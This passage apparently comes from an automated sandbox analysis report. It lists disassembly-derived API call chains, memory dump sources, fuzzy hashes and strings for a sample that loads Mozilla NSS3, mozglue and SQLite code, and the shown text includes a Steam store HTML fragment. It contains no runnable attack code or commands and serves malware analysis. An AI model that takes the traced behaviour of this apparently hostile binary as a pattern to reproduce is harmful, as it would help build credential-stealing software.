                                                                                                                                                                                            • Part of subcall function 6C5964F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6C59127C,00000000,00000000,00000000), ref: 6C59650E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
                                                                                                                                                                                          • String ID: security
                                                                                                                                                                                          • API String ID: 3323615905-3315324353
                                                                                                                                                                                          • Opcode ID: 424669c030c673788a21e81d222a3fdc9a72ab35ca309408ac2f8770957db17d
                                                                                                                                                                                          • Instruction ID: 01926561ee991019fbb76d40bf22773f998a00d2ad970db4a7cdc306772967d3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 424669c030c673788a21e81d222a3fdc9a72ab35ca309408ac2f8770957db17d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 93115E36900315AFD76096669C84FFB7378AF4274CF05092DE80462E41FB61A94CC5FB
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000400), ref: 6C5A4DCB
                                                                                                                                                                                            • Part of subcall function 6C590FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C5387ED,00000800,6C52EF74,00000000), ref: 6C591000
                                                                                                                                                                                            • Part of subcall function 6C590FF0: PR_NewLock.NSS3(?,00000800,6C52EF74,00000000), ref: 6C591016
                                                                                                                                                                                            • Part of subcall function 6C590FF0: PL_InitArenaPool.NSS3(00000000,security,6C5387ED,00000008,?,00000800,6C52EF74,00000000), ref: 6C59102B
                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6C5A4DE1
                                                                                                                                                                                            • Part of subcall function 6C5910C0: TlsGetValue.KERNEL32(?,6C538802,00000000,00000008,?,6C52EF74,00000000), ref: 6C5910F3
                                                                                                                                                                                            • Part of subcall function 6C5910C0: EnterCriticalSection.KERNEL32(?,?,6C538802,00000000,00000008,?,6C52EF74,00000000), ref: 6C59110C
                                                                                                                                                                                            • Part of subcall function 6C5910C0: PL_ArenaAllocate.NSS3(?,?,?,6C538802,00000000,00000008,?,6C52EF74,00000000), ref: 6C591141
                                                                                                                                                                                            • Part of subcall function 6C5910C0: PR_Unlock.NSS3(?,?,?,6C538802,00000000,00000008,?,6C52EF74,00000000), ref: 6C591182
                                                                                                                                                                                            • Part of subcall function 6C5910C0: TlsGetValue.KERNEL32(?,6C538802,00000000,00000008,?,6C52EF74,00000000), ref: 6C59119C
                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6C5A4DFF
                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C5A4E59
                                                                                                                                                                                            • Part of subcall function 6C58FAB0: free.MOZGLUE(?,-00000001,?,?,6C52F673,00000000,00000000), ref: 6C58FAC7
                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C66300C,00000000), ref: 6C5A4EB8
                                                                                                                                                                                          • SECOID_FindOID_Util.NSS3(?), ref: 6C5A4EFF
                                                                                                                                                                                          • memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6C5A4F56
                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C5A521A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1025791883-0
                                                                                                                                                                                          • Opcode ID: 9d15f081dff0cf4e3227dce81db3b71bfc0723ec02b65dc358434a1e2919f8d3
                                                                                                                                                                                          • Instruction ID: 060bfce9566ed4a48607eea10f003f13b0d1ce071dcb1ff6bf7da22d93d7253c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9d15f081dff0cf4e3227dce81db3b71bfc0723ec02b65dc358434a1e2919f8d3
                                                                                                                                                                                          • Instruction Fuzzy Hash: C5F19171E00205CBDB04CF96D840BADB7B2FF88358F658169D915AB781EB35E982CF91
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704117784.000000006C410000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704193891.000000006C48D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704222004.000000006C49E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704248452.000000006C4A2000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: free$moz_xmalloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3009372454-0
                                                                                                                                                                                          • Opcode ID: 037bde49111960e0ac13b950dc139558b8f8ba9f091e90e18f96157104249253
                                                                                                                                                                                          • Instruction ID: 447e39e7c90db4e6f4d4adb80487c162f9cbc55123e15c7f401e859eb5c54d29
                                                                                                                                                                                          • Opcode Fuzzy Hash: 037bde49111960e0ac13b950dc139558b8f8ba9f091e90e18f96157104249253
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5EB1F275A081108FDB18DF2CD890F7D76A2AF463ACF18162CE4A6DBFC2D73499408B91
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704117784.000000006C410000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704193891.000000006C48D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704222004.000000006C49E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704248452.000000006C4A2000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1192971331-0
                                                                                                                                                                                          • Opcode ID: ef0a30759c8f4ec2597c9d3eb30fedfc85d79291216fa9c9247b4da7dd68389d
                                                                                                                                                                                          • Instruction ID: 1995d08f55ce731e22b20ed955425e78f146d0d65772ddc0b1c2c2f0eccb435d
                                                                                                                                                                                          • Opcode Fuzzy Hash: ef0a30759c8f4ec2597c9d3eb30fedfc85d79291216fa9c9247b4da7dd68389d
                                                                                                                                                                                          • Instruction Fuzzy Hash: A0317EB1A047048FDB10FF78C648AAEBBF5BF95305F01892DE88587301EB709448CB92
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C4D2F3D
                                                                                                                                                                                          • memset.VCRUNTIME140(?,00000000,?), ref: 6C4D2FB9
                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,00000000,?), ref: 6C4D3005
                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,?), ref: 6C4D30EE
                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C4D3131
                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001086C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C4D3178
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy$memsetsqlite3_log
                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                          • API String ID: 984749767-598938438
                                                                                                                                                                                          • Opcode ID: 2e9efc4a0f8d1959baa8e3c1afb13a5409a985d5107d5200a3c01a9098d975b1
                                                                                                                                                                                          • Instruction ID: c9dada6911196d35ed250c2ab26c295944f04996cf0a36561175dc5171aacdff
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e9efc4a0f8d1959baa8e3c1afb13a5409a985d5107d5200a3c01a9098d975b1
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9CB1BDB0E052199BCB19DF9DC894EEEBBB1BF48304F15842DE805B7B45D774A842CBA4
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: __allrem
                                                                                                                                                                                          • String ID: @dl$Pdl$winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2$dl
                                                                                                                                                                                          • API String ID: 2933888876-3021566760
                                                                                                                                                                                          • Opcode ID: 2d1f99e930fa5ccdd6d69e89c4dc0769d363ab354e32398895b46f1442c62c66
                                                                                                                                                                                          • Instruction ID: 798289d179f8f69a5e1664636a94aaae7c03f2becf0fd37f2bb18413a34fe234
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2d1f99e930fa5ccdd6d69e89c4dc0769d363ab354e32398895b46f1442c62c66
                                                                                                                                                                                          • Instruction Fuzzy Hash: A561D179B00205AFDB04CF69CC94A6A77F1FF4A324F108528E915AB7D0DB35AD06CBA5
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetFileInformationByHandle.KERNEL32(?,?,00000000,?,0A0524C0), ref: 0003B9C5
                                                                                                                                                                                          • GetFileSize.KERNEL32(?,00000000), ref: 0003BA3E
                                                                                                                                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0003BA5A
                                                                                                                                                                                          • ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 0003BA6E
                                                                                                                                                                                          • SetFilePointer.KERNEL32(?,00000024,00000000,00000000), ref: 0003BA77
                                                                                                                                                                                          • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0003BA87
                                                                                                                                                                                          • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 0003BAA5
                                                                                                                                                                                          • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0003BAB5
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$PointerRead$HandleInformationSize
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2979504256-3916222277
                                                                                                                                                                                          • Opcode ID: 93d723f3a5537babba022680ccc554eed81bb30ab026aa1955077557a87b89a5
                                                                                                                                                                                          • Instruction ID: cdb803ec26d911c427b07d32be8686d86f81c474202c41dcd1c95103aa13ef83
                                                                                                                                                                                          • Opcode Fuzzy Hash: 93d723f3a5537babba022680ccc554eed81bb30ab026aa1955077557a87b89a5
                                                                                                                                                                                          • Instruction Fuzzy Hash: E5511571D0061CAFEB6ADF99DC81AAEBBF9EB04308F10442AE615E7260D7749D45CF11
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenA.KERNEL32(?,750A5460,?,00000000), ref: 0002DBBB
                                                                                                                                                                                          • strchr.MSVCRT ref: 0002DBCD
                                                                                                                                                                                          • strchr.MSVCRT ref: 0002DBF2
                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0002DCF7), ref: 0002DC14
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0002DC21
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0002DCF7), ref: 0002DC28
                                                                                                                                                                                          • strcpy_s.MSVCRT ref: 0002DC6F
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Heaplstrlenstrchr$AllocProcessstrcpy_s
                                                                                                                                                                                          • String ID: 0123456789ABCDEF$`Tu
                                                                                                                                                                                          • API String ID: 453150750-1497512213
                                                                                                                                                                                          • Opcode ID: 5872d20016ff4620bb9217baec96f28f9f576daa5e82d3ba0f1e71060a9fcad5
                                                                                                                                                                                          • Instruction ID: bf80b82487361b3c4c1f3af7cd3d09ddd84d9a9d3c074aa742f20536053a2c86
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5872d20016ff4620bb9217baec96f28f9f576daa5e82d3ba0f1e71060a9fcad5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 28314F719002299FDB00DFE8EC49AEEBBB9AF08355F110169E905FB285DB75AD05CB90
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SECITEM_ArenaDupItem_Util.NSS3(?,6C537D8F,6C537D8F,?,?), ref: 6C536DC8
                                                                                                                                                                                            • Part of subcall function 6C58FDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C58FE08
                                                                                                                                                                                            • Part of subcall function 6C58FDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C58FE1D
                                                                                                                                                                                            • Part of subcall function 6C58FDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C58FE62
                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6C537D8F,?,?), ref: 6C536DD5
                                                                                                                                                                                            • Part of subcall function 6C5910C0: TlsGetValue.KERNEL32(?,6C538802,00000000,00000008,?,6C52EF74,00000000), ref: 6C5910F3
                                                                                                                                                                                            • Part of subcall function 6C5910C0: EnterCriticalSection.KERNEL32(?,?,6C538802,00000000,00000008,?,6C52EF74,00000000), ref: 6C59110C
                                                                                                                                                                                            • Part of subcall function 6C5910C0: PL_ArenaAllocate.NSS3(?,?,?,6C538802,00000000,00000008,?,6C52EF74,00000000), ref: 6C591141
                                                                                                                                                                                            • Part of subcall function 6C5910C0: PR_Unlock.NSS3(?,?,?,6C538802,00000000,00000008,?,6C52EF74,00000000), ref: 6C591182
                                                                                                                                                                                            • Part of subcall function 6C5910C0: TlsGetValue.KERNEL32(?,6C538802,00000000,00000008,?,6C52EF74,00000000), ref: 6C59119C
                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C658FA0,00000000,?,?,?,?,6C537D8F,?,?), ref: 6C536DF7
                                                                                                                                                                                            • Part of subcall function 6C58B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C6618D0,?), ref: 6C58B095
                                                                                                                                                                                          • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C536E35
                                                                                                                                                                                            • Part of subcall function 6C58FDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6C58FE29
                                                                                                                                                                                            • Part of subcall function 6C58FDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6C58FE3D
                                                                                                                                                                                            • Part of subcall function 6C58FDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6C58FE6F
                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C536E4C
                                                                                                                                                                                            • Part of subcall function 6C5910C0: PL_ArenaAllocate.NSS3(?,6C538802,00000000,00000008,?,6C52EF74,00000000), ref: 6C59116E
                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C658FE0,00000000), ref: 6C536E82
                                                                                                                                                                                            • Part of subcall function 6C536AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6C53B21D,00000000,00000000,6C53B219,?,6C536BFB,00000000,?,00000000,00000000,?,?,?,6C53B21D), ref: 6C536B01
                                                                                                                                                                                            • Part of subcall function 6C536AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6C536B8A
                                                                                                                                                                                          • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C536F1E
                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C536F35
                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C658FE0,00000000), ref: 6C536F6B
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000,6C537D8F,?,?), ref: 6C536FE1
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 587344769-0
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,6C55CDBB,?,6C55D079,00000000,00000001), ref: 6C57AE10
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,6C55CDBB,?,6C55D079,00000000,00000001), ref: 6C57AE24
                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,6C55D079,00000000,00000001), ref: 6C57AE5A
                                                                                                                                                                                          • memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C55CDBB,?,6C55D079,00000000,00000001), ref: 6C57AE6F
                                                                                                                                                                                          • free.MOZGLUE(85145F8B,?,?,?,?,6C55CDBB,?,6C55D079,00000000,00000001), ref: 6C57AE7F
                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,6C55CDBB,?,6C55D079,00000000,00000001), ref: 6C57AEB1
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C55CDBB,?,6C55D079,00000000,00000001), ref: 6C57AEC9
                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C55CDBB,?,6C55D079,00000000,00000001), ref: 6C57AEF1
                                                                                                                                                                                          • free.MOZGLUE(6C55CDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6C55CDBB,?), ref: 6C57AF0B
                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C55CDBB,?,6C55D079,00000000,00000001), ref: 6C57AF30
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Unlock$CriticalEnterSectionValuefree$memset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 161582014-0
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,00000000,00000000,?,6C55AB7F,?,00000000,?), ref: 6C554CB4
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(0000001C,?,6C55AB7F,?,00000000,?), ref: 6C554CC8
                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,6C55AB7F,?,00000000,?), ref: 6C554CE0
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,6C55AB7F,?,00000000,?), ref: 6C554CF4
                                                                                                                                                                                          • PL_HashTableLookup.NSS3(?,?,?,6C55AB7F,?,00000000,?), ref: 6C554D03
                                                                                                                                                                                          • PR_Unlock.NSS3(?,00000000,?), ref: 6C554D10
                                                                                                                                                                                            • Part of subcall function 6C5DDD70: TlsGetValue.KERNEL32 ref: 6C5DDD8C
                                                                                                                                                                                            • Part of subcall function 6C5DDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C5DDDB4
                                                                                                                                                                                          • PR_Now.NSS3(?,00000000,?), ref: 6C554D26
                                                                                                                                                                                            • Part of subcall function 6C5F9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C640A27), ref: 6C5F9DC6
                                                                                                                                                                                            • Part of subcall function 6C5F9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C640A27), ref: 6C5F9DD1
                                                                                                                                                                                            • Part of subcall function 6C5F9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C5F9DED
                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,00000000,?), ref: 6C554D98
                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6C554DDA
                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6C554E02
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4032354334-0
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6C4131A7), ref: 6C44CDDD
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • m" href="https://store.steampowered.com/">Home</a><a class="submenuitem" href="https://store.steampowered.com/explore/">Discovery Queue</a><a class="submenuitem" href="https://steamcommunity, xrefs: 6C44CC6F
                                                                                                                                                                                          • : (malloc) Error in VirtualFree(), xrefs: 6C44CFA4, 6C44CFB8
                                                                                                                                                                                          • <jemalloc>, xrefs: 6C44CF9F, 6C44CFB3
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                          • String ID: : (malloc) Error in VirtualFree()$<jemalloc>$m" href="https://store.steampowered.com/">Home</a><a class="submenuitem" href="https://store.steampowered.com/explore/">Discovery Queue</a><a class="submenuitem" href="https://steamcommunity
                                                                                                                                                                                          • API String ID: 4275171209-2593390296
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C532CDA,?,00000000), ref: 6C532E1E
                                                                                                                                                                                            • Part of subcall function 6C58FD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C539003,?), ref: 6C58FD91
                                                                                                                                                                                            • Part of subcall function 6C58FD80: PORT_Alloc_Util.NSS3(A4686C59,?), ref: 6C58FDA2
                                                                                                                                                                                            • Part of subcall function 6C58FD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686C59,?,?), ref: 6C58FDC4
                                                                                                                                                                                          • SECITEM_DupItem_Util.NSS3(?), ref: 6C532E33
                                                                                                                                                                                            • Part of subcall function 6C58FD80: free.MOZGLUE(00000000,?,?), ref: 6C58FDD1
                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C532E4E
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C532E5E
                                                                                                                                                                                          • PL_HashTableLookup.NSS3(?), ref: 6C532E71
                                                                                                                                                                                          • PL_HashTableRemove.NSS3(?), ref: 6C532E84
                                                                                                                                                                                          • PL_HashTableAdd.NSS3(?,00000000), ref: 6C532E96
                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C532EA9
                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C532EB6
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C532EC5
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Util$HashItem_Table$Alloc_$CriticalEnterErrorLookupRemoveSectionUnlockValueZfreefreememcpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3332421221-0
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A7E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C4BB999), ref: 6C4BCFF3
